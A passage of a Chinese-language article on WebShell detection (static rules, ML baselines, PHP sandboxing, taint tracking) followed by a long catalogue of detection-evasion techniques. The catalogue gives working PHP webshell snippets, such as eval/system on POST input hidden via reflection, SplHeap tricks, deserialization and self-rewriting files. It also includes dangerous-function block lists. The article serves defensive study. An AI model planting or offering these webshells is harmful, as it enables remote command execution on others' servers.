if 'eval' in function_calls or 'assert' in function_calls:
# 调用危险函数
return True

if '$_GET' in function_params or '$_POST' in function_params:
# 使用用户输入作为参数
return True

return False

动态检测技术

行为分析与机器学习

行为分析通过学习正常代码行为基线(函数调用频率、文件操作、网络连接),识别异常代码执行。

检测流程

  1. 数据采集:收集代码执行的各种特征
  2. 特征提取:提取函数调用、文件操作、网络连接等特征
  3. 基线建立:使用机器学习建立正常代码行为基线
  4. 异常检测:实时检测偏离基线的异常行为
  5. 动态调整:根据检测结果动态调整检测阈值

核心优势

  • 检测未知WebShell:不依赖已知WebShell特征,能检测0day
  • 自适应能力强:能自动适应业务变化
  • 误报率低:通过机器学习减少误报
  • 实时响应:能快速响应新型WebShell

主要局限

  • 需要训练数据:需要大量正常代码数据训练
  • 冷启动问题:新业务上线初期误报率高
  • 计算开销大:机器学习模型需要较多计算资源
  • 可解释性差:难以解释为什么某个代码被拦截

应用场景

异常函数调用检测

  • 检测频繁调用危险函数
  • 识别异常的函数调用模式
  • 防止恶意代码执行

异常文件操作检测

  • 检测异常的文件读写操作
  • 识别异常的文件创建行为
  • 防止文件系统被破坏

异常网络连接检测

  • 检测异常的网络连接
  • 识别异常的HTTP请求
  • 防止数据泄露

异常进程行为检测

  • 检测异常的进程创建
  • 识别异常的进程通信
  • 防止系统被控制

代码行为基线学习

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
class CodeBehaviorAnalyzer:
def __init__(self):
self.baseline = {
'function_calls': {},
'file_operations': {},
'network_connections': {},
'process_behavior': {}
}

def learn_baseline(self, code_samples):
# 学习函数调用基线
self.learn_function_calls_baseline(code_samples)

# 学习文件操作基线
self.learn_file_operations_baseline(code_samples)

# 学习网络连接基线
self.learn_network_connections_baseline(code_samples)

# 学习进程行为基线
self.learn_process_behavior_baseline(code_samples)

def learn_function_calls_baseline(self, code_samples):
# 学习函数调用频率
function_calls = {}
for code in code_samples:
calls = self.extract_function_calls(code)
for call in calls:
if call not in function_calls:
function_calls[call] = 0
function_calls[call] += 1

# 计算函数调用的统计特征
for func, count in function_calls.items():
self.baseline['function_calls'][func] = {
'count': count,
'frequency': count / len(code_samples)
}

def detect_anomaly(self, code):
# 检测函数调用异常
if self.detect_function_call_anomaly(code):
return True

# 检测文件操作异常
if self.detect_file_operation_anomaly(code):
return True

# 检测网络连接异常
if self.detect_network_connection_anomaly(code):
return True

# 检测进程行为异常
if self.detect_process_behavior_anomaly(code):
return True

return False

机器学习模型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
class MLBasedWebShellDetector:
def __init__(self):
# 训练特征提取器
self.feature_extractor = CodeFeatureExtractor()

# 训练分类模型
self.model = self.train_model()

def extract_features(self, code):
# 提取代码特征
features = {
# 代码长度特征
'code_length': len(code),
'line_count': len(code.split('\n')),

# 函数调用特征
'dangerous_function_count': self.count_dangerous_functions(code),
'total_function_count': self.count_total_functions(code),

# 字符串特征
'string_count': self.count_strings(code),
'base64_count': self.count_base64_strings(code),

# 变量特征
'variable_count': self.count_variables(code),
'superglobal_count': self.count_superglobals(code),

# 控制流特征
'if_count': self.count_if_statements(code),
'loop_count': self.count_loops(code),

# 编码特征
'encoding_count': self.count_encoding_functions(code)
}
return features

def predict(self, code):
# 提取特征
features = self.extract_features(code)

# 预测
prediction = self.model.predict([features])[0]

# 获取预测概率
probability = self.model.predict_proba([features])[0][1]

return {
'is_malicious': prediction == 1,
'confidence': probability
}

def train_model(self):
# 训练机器学习模型
# 使用随机森林分类器
from sklearn.ensemble import RandomForestClassifier

model = RandomForestClassifier(
n_estimators=100,
max_depth=10,
random_state=42
)

# 加载训练数据
X_train, y_train = self.load_training_data()

# 训练模型
model.fit(X_train, y_train)

return model

沙箱模拟技术

工作原理

沙箱模拟通过模拟PHP执行环境,在隔离的环境中执行代码,检测恶意行为。

检测流程

  1. 环境准备:准备隔离的PHP执行环境
  2. 代码执行:在沙箱中执行代码
  3. 行为监控:监控代码执行过程中的行为
  4. 行为分析:分析代码执行行为是否恶意
  5. 结果判定:根据行为分析结果判定是否为WebShell

核心优势

  • 检测加密WebShell:可以检测加密的WebShell
  • 检测混淆WebShell:可以检测混淆的WebShell
  • 检测0day WebShell:可以检测未知的WebShell
  • 准确率高:通过实际执行代码,准确率高

主要局限

  • 性能开销大:需要完整的PHP执行环境
  • 绕过可能:攻击者可以通过环境检测绕过
  • 安全风险:沙箱逃逸可能导致安全问题
  • 资源消耗:需要大量的计算资源

应用场景

加密WebShell检测

  • 检测Base64加密的WebShell
  • 检测Gzip压缩的WebShell
  • 检测自定义加密的WebShell

混淆WebShell检测

  • 检测代码混淆的WebShell
  • 检测变量混淆的WebShell
  • 检测函数混淆的WebShell

0day WebShell检测

  • 检测未知的WebShell变种
  • 检测新型的WebShell技术
  • 检测自定义的WebShell

动态行为检测

  • 检测文件操作行为
  • 检测网络连接行为
  • 检测进程创建行为

沙箱技术实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
class PHPSandbox:
def __init__(self):
# 初始化PHP沙箱环境
self.environment = self.create_sandbox_environment()

# 初始化行为监控
self.monitor = BehaviorMonitor()

def create_sandbox_environment(self):
# 创建隔离的PHP执行环境
environment = {
'file_system': VirtualFileSystem(),
'network': VirtualNetwork(),
'process': VirtualProcess(),
'environment_variables': {}
}

return environment

def execute_code(self, code):
# 在沙箱中执行代码
try:
# 启动行为监控
self.monitor.start()

# 执行代码
result = self._execute_php_code(code)

# 停止行为监控
self.monitor.stop()

# 分析行为
behaviors = self.monitor.get_behaviors()

# 判定是否恶意
is_malicious = self.analyze_behaviors(behaviors)

return {
'result': result,
'behaviors': behaviors,
'is_malicious': is_malicious
}

except Exception as e:
return {
'error': str(e),
'is_malicious': True
}

def analyze_behaviors(self, behaviors):
# 分析行为是否恶意
malicious_behaviors = [
'file_write',
'file_delete',
'network_connection',
'process_create',
'command_execution'
]

for behavior in behaviors:
if behavior['type'] in malicious_behaviors:
return True

return False

行为监控

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
class BehaviorMonitor:
def __init__(self):
self.behaviors = []
self.monitoring = False

def start(self):
# 启动行为监控
self.monitoring = True
self.behaviors = []

# 监控文件操作
self.monitor_file_operations()

# 监控网络连接
self.monitor_network_connections()

# 监控进程创建
self.monitor_process_creation()

# 监控命令执行
self.monitor_command_execution()

def stop(self):
# 停止行为监控
self.monitoring = False

def get_behaviors(self):
# 获取监控到的行为
return self.behaviors

def record_behavior(self, behavior_type, details):
# 记录行为
if self.monitoring:
self.behaviors.append({
'type': behavior_type,
'details': details,
'timestamp': time.time()
})

def monitor_file_operations(self):
# 监控文件操作
# 拦截file_put_contents、file_get_contents等函数
pass

def monitor_network_connections(self):
# 监控网络连接
# 拦截curl、fsockopen等函数
pass

def monitor_process_creation(self):
# 监控进程创建
# 拦截exec、system等函数
pass

def monitor_command_execution(self):
# 监控命令执行
# 拦截shell_exec、passthru等函数
pass

污点追踪技术

工作原理

污点追踪通过追踪用户输入在代码执行过程中的传播路径,检测恶意代码。

检测流程

  1. 污点标记:标记用户输入为污点
  2. 污点传播:追踪污点在代码中的传播
  3. 污点汇聚:检测污点是否到达危险函数
  4. 风险评估:根据污点传播路径评估风险
  5. 结果判定:根据风险评估结果判定是否为WebShell

核心优势

  • 检测隐藏WebShell:可以检测隐藏的WebShell
  • 检测变形WebShell:可以检测变形的WebShell
  • 检测复杂WebShell:可以检测复杂的WebShell
  • 准确率高:通过追踪污点传播,准确率高

主要局限

  • 性能开销大:需要追踪所有变量的传播
  • 绕过可能:攻击者可以通过切断污点链绕过
  • 误报问题:正常代码可能触发污点检测
  • 技术复杂:需要完整的代码分析技术

应用场景

用户输入追踪

  • 追踪$_GET、$_POST等用户输入
  • 追踪$_COOKIE、$_SERVER等环境变量
  • 追踪$_FILES等文件上传

变量传播追踪

  • 追踪变量赋值传播
  • 追踪函数调用传播
  • 追踪对象引用传播

危险函数检测

  • 检测污点是否到达eval函数
  • 检测污点是否到达assert函数
  • 检测污点是否到达system函数

代码执行检测

  • 检测污点是否到达代码执行函数
  • 检测污点是否到达命令执行函数
  • 检测污点是否到达文件包含函数

污点分析类型

前向污点分析

  • 从污点源开始,向前追踪污点传播
  • 检测污点是否到达危险函数
  • 优点:准确率高
  • 缺点:性能开销大

后向污点分析

  • 从危险函数开始,向后追踪污点来源
  • 检测危险函数的参数是否来自用户输入
  • 优点:性能开销小
  • 缺点:准确率低

混合污点分析

  • 结合前向和后向污点分析
  • 平衡准确率和性能
  • 优点:准确率和性能平衡
  • 缺点:技术复杂

污点追踪实战示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
class TaintTracker:
def __init__(self):
# 初始化污点追踪器
self.tainted_vars = {}
self.taint_sources = [
'$_GET',
'$_POST',
'$_COOKIE',
'$_REQUEST',
'$_FILES',
'$_SERVER'
]
self.sink_functions = [
'eval',
'assert',
'system',
'exec',
'passthru',
'shell_exec',
'popen',
'proc_open'
]

def track_taint(self, code):
# 追踪污点传播
# 标记污点源
self.mark_taint_sources(code)

# 追踪污点传播
self.track_taint_propagation(code)

# 检测污点汇聚
sinks = self.detect_taint_sinks(code)

return sinks

def mark_taint_sources(self, code):
# 标记污点源
for source in self.taint_sources:
# 查找所有使用污点源的地方
matches = re.finditer(r'\b' + re.escape(source) + r'\[([^\]]+)\]', code)
for match in matches:
var_name = match.group(1)
self.tainted_vars[var_name] = {
'source': source,
'line': code[:match.start()].count('\n') + 1
}

def track_taint_propagation(self, code):
# 追踪污点传播
# 追踪变量赋值
self.track_variable_assignment(code)

# 追踪函数调用
self.track_function_call(code)

# 追踪对象引用
self.track_object_reference(code)

def track_variable_assignment(self, code):
# 追踪变量赋值
# 查找所有变量赋值
matches = re.finditer(r'\$([a-zA-Z_][a-zA-Z0-9_]*)\s*=', code)
for match in matches:
var_name = match.group(1)
# 检查赋值表达式是否包含污点变量
assignment_expr = code[match.end():]
# 简化处理,实际需要更复杂的表达式分析
if any(tainted_var in assignment_expr for tainted_var in self.tainted_vars):
self.tainted_vars[var_name] = {
'source': 'assignment',
'line': code[:match.start()].count('\n') + 1
}

def detect_taint_sinks(self, code):
# 检测污点汇聚
sinks = []
for sink in self.sink_functions:
# 查找所有调用危险函数的地方
matches = re.finditer(r'\b' + re.escape(sink) + r'\s*\(', code)
for match in matches:
# 检查函数参数是否包含污点变量
func_call = code[match.start():]
# 简化处理,实际需要更复杂的参数分析
if any(tainted_var in func_call for tainted_var in self.tainted_vars):
sinks.append({
'function': sink,
'line': code[:match.start()].count('\n') + 1,
'tainted_vars': [var for var in self.tainted_vars if var in func_call]
})
return sinks

WebShell绕过技术

静态检测绕过

函数名大小写绕过

1
2
3
4
5
6
7
// 原始代码
eval($_POST['cmd']);

// 大小写变形
EVAL($_POST['cmd']);
Eval($_POST['cmd']);
eVaL($_POST['cmd']);

函数别名绕过

1
2
3
4
5
// mb_ereg_replace的别名
mbereg_replace('.*', '\0', $_REQUEST['cmd'], 'e');

// mb_ereg_ireplace的别名
mbereg_ireplace('.*', '\0', $_REQUEST['cmd'], 'e');

函数别名机制绕过

1
2
3
4
5
6
7
// 重命名assert函数
use function \assert as test;
test($_POST['cmd']);

// 匿名类中的别名
use function \system as cmd;
cmd($_POST['arg']);

类继承绕过

1
2
3
4
5
6
7
8
// 继承ReflectionFunction类
class test extends ReflectionFunction {}
$f = new test('system');
$f->invoke($_POST['cmd']);

// 使用匿名类
$f = new class('system') extends ReflectionFunction {};
$f->invoke($_POST['cmd']);

参数列表展开绕过

1
2
3
4
5
6
7
8
// 原始代码
usort($_GET, 'assert');

// 参数展开
usort(...$_GET);

// 实际调用
// usort($_GET[0], $_GET[1])

控制字符绕过

1
2
3
// 插入控制字符
$content = "<?php eval \x01\x02(\$_POST['cmd']);";
file_put_contents('shell.php', $content);

PHP标签绕过

1
2
3
4
5
6
7
// 使用<script>标签
<script language="php">
eval($_POST['cmd']);
</script>

// 使用<%>标签(PHP7之前)
<% eval($_POST['cmd']); %>

编码混淆绕过

1
2
3
4
5
6
7
8
9
10
11
12
// Base64编码
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

// Gzip压缩
eval(gzuncompress(base64_decode('...')));

// 多重编码
eval(gzinflate(str_rot13(base64_decode('...'))));

// 自定义编码
$code = str_rot13($_POST['code']);
eval($code);

字符串拼接绕过

1
2
3
4
5
6
7
8
9
// 字符串拼接
$func = 'e' . 'v' . 'a' . 'l';
$func($_POST['cmd']);

$func = 'sys' . 'tem';
$func($_POST['cmd']);

$func = $_GET['f1'] . $_GET['f2'];
$func($_POST['cmd']);

变量函数绕过

1
2
3
4
5
6
7
8
// 变量函数
$func = 'eval';
$func($_POST['cmd']);

$func = $_GET['func'];
$func($_POST['cmd']);

$_GET['f']($_POST['cmd']);

动态检测绕过

污点跟踪链切断

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// 数组元素引用
$b = "111";
$c = "222";
if(get_cfg_var('error_reporting')>0){
$b="#";
}
$a = array("one"=>$c, "two"=>&$c);
$url = "http://a/usr/".$b."?a=1";
$d = parse_url($url);
if($d['query']){
$c="echo 111;";
} else{
$c=$_FILES['useraccount']['name'];
}
eval($a["two"]);

环境差异绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
// 配置差异
if(get_cfg_var('error_reporting')>0){
$b="#";
} else {
$b="?";
}
$url = "http://a/usr/".$b."?a=1";
$d = parse_url($url);
if($d['query']){
$c="echo 111;";
} else{
$c=$_FILES['useraccount']['name'];
}
eval($c);

内存限制绕过

1
2
3
4
// 消耗大量内存
ini_set("memory_limit", "100G");
$var = str_repeat("php7_do9gy", 100000000);
eval($_POST['cmd']);

堆排序绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// 利用堆排序特性
$obj = new SplMaxHeap();
$obj->insert($_GET['a']);
$obj->insert(8);
$obj->insert('system');
$obj->insert(7);
$obj->insert(0);
$i=0;
foreach($obj as $number){
$i++;
if($i==1){
$a = $number;
}
if($i==2){
$b = $number;
}
}
$a($b);

优先级队列绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// 利用优先级队列特性
$objPQ = new SplPriorityQueue();
$objPQ->insert('m', 1);
$objPQ->insert('s', 6);
$objPQ->insert('e', 3);
$objPQ->insert('s', 4);
$objPQ->insert('y', 5);
$objPQ->insert('t', $_GET['a']);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
$objPQ->top();
$m='';
$cur = new ErrorException($_GET['b']);
while($objPQ->valid()){
$m.=$objPQ->current();
$objPQ->next();
}
echo $m($cur->getMessage());

错误处理绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// 通过错误处理机制
set_error_handler(function($error_no, $error_msg, $error_file, $error_line){
trigger_error("xxxxxx", E_USER_ERROR);
}, E_WARNING | E_STRICT);

function xxxe(){
$gen = (function(){
yield 1;
yield $_GET[1];
return 3;
})();
foreach($gen as $val){
echo 1/$_GET['x'];
array_reduce(array(1), join(array_diff(["sys","tem"],[])), ($val));
}
}
header_register_callback('xxxe');

类型转换绕过

1
2
3
4
5
// 利用类型转换特性
function bypass(int $flag){
return $flag;
}
bypass($_GET['cmd']);

内置类绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
// 利用内置类
trait system{}
$a = new JsonException($_GET['a']);
$c = "123";
$arr = getmygid();
$i=0;
for($i;$i<$arr;$i++){
$i++;
if($i<115 || $i>=116){
continue;
}
$c=$a->getMessage();
print(get_declared_traits()[0]($c));
}

内存文件绕过

1
2
3
4
5
// 利用内存文件对象
$a = new SplTempFileObject(1000000);
$a->fwrite($_GET['a']);
$a->rewind();
substr(get_declared_classes()[72],4,6)($a->fgets());

自我修改绕过

1
2
3
4
5
6
7
// 通过修改自身文件
$s="Declaring file object\n";
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];
$file = new SplFileObject($d,'w');
$file->fwrite("<?php"." eva".$s[3]);
$file->fwrite("(\$_"."GET"."[a]);?>");
include(get_included_files()[0]);

高级绕过技术

反射机制绕过

1
2
3
4
5
6
7
// 利用反射机制
$reflection = new ReflectionFunction('system');
$reflection->invoke($_POST['cmd']);

$reflection = new ReflectionClass('system');
$method = $reflection->getMethod('__invoke');
$method->invoke(null, $_POST['cmd']);

闭包绕过

1
2
3
4
5
6
7
8
// 利用闭包函数
$func = function($cmd){
return system($cmd);
};
$func($_POST['cmd']);

$func = create_function('$cmd', 'return system($cmd);');
$func($_POST['cmd']);

生成器绕过

1
2
3
4
5
6
7
8
9
10
// 利用生成器函数
function gen(){
yield 'sys';
yield 'tem';
}
$func = '';
foreach(gen() as $part){
$func .= $part;
}
$func($_POST['cmd']);

魔术方法绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
// 利用魔术方法
class Shell{
public function __destruct(){
system($_POST['cmd']);
}
}
unserialize($_POST['data']);

class Shell{
public function __wakeup(){
system($_POST['cmd']);
}
}
unserialize($_POST['data']);

命名空间绕过

1
2
3
4
5
6
7
8
// 利用命名空间
namespace evil{
function system($cmd){
return \system($cmd);
}
}
use evil\system;
system($_POST['cmd']);

防御建议

多层防御架构

纵深防护体系

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
第一层:WAF(流量层防护)
├── 协议深度解析
├── 静态检测(特征匹配)
├── 动态检测(行为分析)
├── 虚拟补丁
├── CC与爬虫防护
└── 威胁情报联动

第二层:WebShell查杀引擎(文件层防护)
├── 静态检测(特征匹配)
├── 动态检测(行为分析)
├── 沙箱模拟
└── 污点追踪

第三层:HIDS(主机层防护)
├── 文件监控
├── 进程监控
├── 网络监控
└── 行为分析

持续监控

实时监控要点

WAF监控

  • 监控拦截的攻击类型
  • 监控拦截的攻击来源
  • 监控拦截的攻击频率
  • 监控误报率

WebShell查杀监控

  • 监控检测到的WebShell
  • 监控WebShell的来源
  • 监控WebShell的类型
  • 监控误报率

主机安全监控

  • 监控文件变化
  • 监控进程变化
  • 监控网络连接
  • 监控系统日志

定期更新

更新要点

规则库更新

  • 更新WAF攻击特征库
  • 更新WebShell特征库
  • 更新威胁情报库

模型更新

  • 重新训练机器学习模型
  • 更新行为基线
  • 更新检测阈值

系统更新

  • 更新检测引擎
  • 更新沙箱环境
  • 更新污点追踪算法

总结

关键要点

WAF与WebShell查杀引擎的区别

  • WAF:工作在网络边界,拦截HTTP流量攻击
  • WebShell查杀引擎:工作在服务器内部,检测恶意文件

技术对比

  • WAF核心技术:协议解析、特征匹配、行为分析、虚拟补丁、威胁情报
  • WebShell查杀引擎核心技术:特征匹配、行为分析、沙箱模拟、污点追踪

防御策略

  • 多层防御:WAF + WebShell查杀引擎 + HIDS
  • 持续监控:实时监控攻击和异常
  • 定期更新:更新规则库和模型

对抗与防御

  • 攻击者不断寻找绕过方法
  • 防御者不断更新检测技术
  • 安全是一个持续的对抗过程

注意: 本文仅用于安全研究和防御目的,请勿用于非法攻击行为。